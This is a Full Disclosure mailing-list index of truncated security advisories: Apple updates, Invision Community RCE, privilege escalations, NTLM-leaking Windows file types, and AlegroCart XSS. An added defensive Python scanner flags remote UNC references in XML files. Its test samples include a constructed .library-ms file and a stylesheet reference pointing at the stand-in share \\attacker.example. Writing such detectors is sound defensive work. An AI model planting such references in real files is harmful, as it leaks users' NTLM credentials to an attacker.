2025-05-16 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-05-12-2025-2 iPadOS 17.7.7 iPadOS 17.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/122405. Apple maintains a Security Releases page at https://support.apple.com/10

[FD] APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5

2025-05-16 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5 iOS 18.5 and iPadOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122404. Apple maintains a Security Releases page at https:

[FD] [KIS-2025-02] Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability

2025-05-16 Thread Egidio Romano
--- Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability --- [-] Software Link: https://invisioncommunity.com [-] Affected Vers

[FD] secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix

2025-05-16 Thread Flo Schäfer via Fulldisclosure
secuvera-SA-2025-01: Privilege Escalation Affected Products Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1 References secuvera-SA-2025-01 CVE not assigned yet CWE-426: Untrusted Search Path CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L Summary: An age

[FD] BeyondTrust PRA connection takeover - CVE-2025-0217

2025-05-06 Thread Paul Szabo via Fulldisclosure
=== Details Vendor: BeyondTrust Product: Privileged Remote Access (PRA) Subject: PRA connection takeover CVE ID: CVE-2025-0217 CVSS: 7.8 (high) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Author: Paul Szabo Date: 2025-05-05

[FD] Microsoft Windows .XRM-MS File / NTLM Information Disclosure Spoofing

2025-05-01 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vuln

[FD] [IWCC 2025] CfP: 14th International Workshop on Cyber Crime - Ghent, Belgium, Aug 11-14, 2025

2025-04-26 Thread Artur Janicki via Fulldisclosure
[APOLOGIES FOR CROSS-POSTING] CALL FOR PAPERS 14th International Workshop on Cyber Crime (IWCC 2025 - https://2025.ares-conference.eu/program/iwcc/) to be held in conjunction with the 20th International Conference on Availability, Reliability and Security (ARES 2025 - http://2025.ares-conference.e

[FD] Inedo ProGet Insecure Reflection and CSRF Vulnerabilities

2025-04-26 Thread Daniel Owens via Fulldisclosure
Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks (among other things) because the information system directly exposes the C# reflection used during the request-action mapping process and fails to properly protect certain pathwa

[FD] Microsoft ".library-ms" File / NTLM Information Disclosure (Resurrected 2025)

2025-04-26 Thread hyp3rlinx
[-] Microsoft ".library-ms" File / NTLM Information Disclosure Spoofing (Resurrected 2025) / CVE-2025-24054 [+] John Page (aka hyp3rlinx) [+] x.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018, I reported a ".library-ms" File NTLM information disclosure vulnerability to MSRC and was told "it was
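Both hyp3rlinx posts in this listing (the .XRM-MS one above and this .library-ms one) concern Windows file types whose contents can point at a remote share; when Explorer or the handling application follows that reference, the client authenticates to the attacker's host and the user's NTLM response leaves the machine. The script below is an added example written for this index, not code from either advisory: it scans an XML-based file for UNC, //host and file://host references to non-loopback hosts, in element text, attribute values and processing instructions. The sample documents, the host name attacker.example and the element names in the stylesheet sample are constructed for the demo; the library description is modelled on the public .library-ms schema, and the stylesheet sample only illustrates a second place an external reference can hide, not the actual .xrm-ms trigger.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Hosts that never leave the machine; a reference to them is not a leak.
LOOPBACK = {"localhost", "127.0.0.1", "::1", "."}

# Forms Windows resolves as a network path: \\host\share, \\?\UNC\host\share,
# //host/share and file://host/share. The lookbehind stops http://host and
# doubled backslashes inside C:\\path from matching. Group 1 is the host.
REMOTE_REF_RE = re.compile(
    r"""(?i)(?<![\w\\/:])(?:\\\\\?\\UNC\\|\\\\|//|file://)([A-Za-z0-9._-]+)[^\s"'<>]*"""
)

# Constructed sample of a .library-ms library description (schema modelled
# on the public format) whose default location is an attacker-controlled
# share; the host name is invented.
SAMPLE_LIBRARY_MS = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\attacker.example\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign file: a local folder, a loopback share and an http URL.
SAMPLE_BENIGN = r"""<?xml version="1.0"?>
<libraryDescription>
  <url>C:\Users\Public\Documents</url>
  <url>\\localhost\c$\tools</url>
  <url>http://docs.example/help</url>
</libraryDescription>
"""

# Constructed XML carrying an external reference in a processing instruction;
# an illustration of where else such a reference can sit, not a claim about
# the .xrm-ms format.
SAMPLE_STYLESHEET_PI = r"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="\\attacker.example\x.xsl"?>
<license><data/></license>
"""

def remote_hosts_in(value):
    """Return (host, matched path) for each non-loopback network path."""
    hits = []
    for m in REMOTE_REF_RE.finditer(value):
        host = m.group(1).lower()
        if host not in LOOPBACK:
            hits.append((host, m.group(0)))
    return hits

def local_name(tag):
    """Strip an XML namespace prefix such as {http://...}url down to url."""
    return tag.rsplit("}", 1)[-1]

def scan_xml(text):
    """Return (location, host, path) findings for one XML document."""
    findings = []
    # ElementTree discards processing instructions, so pull them from the
    # raw text first; the XML declaration itself is skipped.
    for pi in re.findall(r"<\?(?!xml[\s?])[^>]*\?>", text):
        for host, ref in remote_hosts_in(pi):
            findings.append(("processing-instruction", host, ref))
    root = ET.fromstring(text.encode("utf-8"))
    for elem in root.iter():
        name = local_name(elem.tag)
        for host, ref in remote_hosts_in(elem.text or ""):
            findings.append((name, host, ref))
        for attr, value in elem.attrib.items():
            for host, ref in remote_hosts_in(value):
                findings.append((name + "@" + local_name(attr), host, ref))
    return findings

if __name__ == "__main__":
    # Usage: python scan_unc_refs.py file.library-ms [more files...]
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for where, host, ref in scan_xml(fh.read()):
                print(f"{path}: {where} -> {host} ({ref})")
```

Run it over inbound attachments or a mail gateway's extracted files; a hit on a non-loopback host in a .library-ms, .xrm-ms or similar XML-based Windows file is worth quarantining before a user's shell ever renders it. The script only reasons about XML content; other NTLM-coercion carriers (.url and .scf files, shortcut icon paths) have their own formats and need their own parsers.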

[FD] Ruby on Rails Cross-Site Request Forgery

2025-04-26 Thread Daniel Owens via Fulldisclosure
Good morning. All current versions and all versions since the 2022/2023 "fix" to the Rails cross-site request forgery (CSRF) protections continue to be vulnerable to the same attacks as the 2022 implementation. Currently, Rails generates "authenticity tokens" and "csrf tokens" using a random "

[FD] HNS-2025-10 - HN Security Advisory - Local privilege escalation in Zyxel uOS

2025-04-23 Thread Marco Ivaldi
Hi, Please find attached a security advisory that describes some vulnerabilities we discovered in the Zyxel uOS Linux-based operating system. * Title: Local privilege escalation via Zyxel fermion-wrapper * Product: USG FLEX H Series * OS: Zyxel uOS V1.31 (and potentially earlier versions) * Autho

[FD] APPLE-SA-04-16-2025-4 visionOS 2.4.1

2025-04-23 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-04-16-2025-4 visionOS 2.4.1 visionOS 2.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122402. Apple maintains a Security Releases page at https://support.apple.com/

[FD] APPLE-SA-04-16-2025-3 tvOS 18.4.1

2025-04-23 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-04-16-2025-3 tvOS 18.4.1 tvOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122401. Apple maintains a Security Releases page at https://support.apple.com/100100

[FD] APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1

2025-04-23 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-04-16-2025-2 macOS Sequoia 15.4.1 macOS Sequoia 15.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122400. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1

2025-04-23 Thread Apple Product Security via Fulldisclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-04-16-2025-1 iOS 18.4.1 and iPadOS 18.4.1 iOS 18.4.1 and iPadOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122282. Apple maintains a Security Releases page a

[FD] Stored XSS in "Message" Functionality - AlegroCartv1.2.9

2025-04-23 Thread Andrey Stoykov
# Exploit Title: Stored XSS in "Message" Functionality - alegrocartv1.2.9 # Date: 04/2025 # Exploit Author: Andrey Stoykov # Version: 1.2.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Login as demonstrator account and visit "Customers" >

[FD] Business Logic Flaw: Price Manipulation - AlegroCartv1.2.9

2025-04-23 Thread Andrey Stoykov
# Exploit Title: Business Logic Flaw: Price Manipulation - alegrocartv1.2.9 # Date: 04/2025 # Exploit Author: Andrey Stoykov # Version: 1.2.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Business Logic Flaw: Price Manipulation #1: Steps to Reproduce: 1. Visit the store and add
